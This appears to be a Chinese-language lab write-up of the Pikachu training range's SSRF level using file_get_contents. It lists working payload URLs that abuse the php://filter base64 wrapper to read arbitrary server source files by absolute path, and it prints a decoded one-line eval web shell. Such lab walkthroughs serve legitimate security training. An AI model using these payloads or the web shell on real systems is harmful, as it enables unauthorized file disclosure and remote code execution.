pikachu靶场-SSRF(Server Side Request Forgery 服务器端请求伪造)-file_get_con – 作者:知非知非知非

1627602231_61033d375669789d0369e.png!small

1627602237_61033d3d357e23fa6125f.png!small

为什么我的眼里常含泪水? 因为我对这土地爱得深沉……!!!!

好诗!!!!

我们还是复制一下链接地址:

http://localhost/pikachu/vul/ssrf/ssrf_fgc.php?file=http://127.0.0.1/pikachu/vul/ssrf/ssrf_info/info2.php

和上一个一样,区别在于上一个用的是CURL,这里用的是FILE_GET_CONTENT函数!!!

1627602244_61033d44e49231611565e.png!small

http://localhost/pikachu/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=D://2.php

1627602251_61033d4b6d6eded78aaff.png!small

BASE64解密后:

<?php @eval($_POST[“zhifei”]);?>

http://localhost/pikachu/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=ssrf.php

至于以上这个链接,我们试着把需要查看源代码文件的链接修改为绝对路径!!!

D:\phpStudy\PHPTutorial\WWW\pikachu\vul\ssrf

http://localhost/pikachu/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=D://phpStudy//PHPTutorial//WWW//pikachu//vul//ssrf//ssrf_fgc.php

有点问题!!!!

试试看,啥毛病!!!

http://localhost/pikachu/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=D://phpStudy//PHPTutorial//WWW//phpinfo.php

1627602276_61033d64cb6a520dd98c8.png!small

1627602288_61033d706d6290e33879e.png!small

没问题!!!

http://localhost/pikachu/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=D://phpStudy//PHPTutorial//WWW//pikachu//2.php

1627602294_61033d7617b9087628f4e.png!small

1627602299_61033d7bb7cc0299c0c1e.png!small

http://localhost/pikachu/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=D://phpStudy//PHPTutorial//WWW//pikachu//vul//ssrf//phpinfo.php

1627602305_61033d81216cc3478737e.png!small

奇怪了,这个目录下的phpinfo.php有正常的回显!!!

但是其它文件,无法显示源代码!!!!

http://localhost/pikachu/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=D://phpStudy//PHPTutorial//WWW//pikachu//vul//ssrf//ssrf_curl.php

哈哈哈哈!!!!搞错了!!!

是显示在下面了!!!

1627602311_61033d8766a8635a14e22.png!small

1627602315_61033d8befe8647a297ad.png!small

来源:freebuf.com 2021-07-30 07:46:26 by: 知非知非知非

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论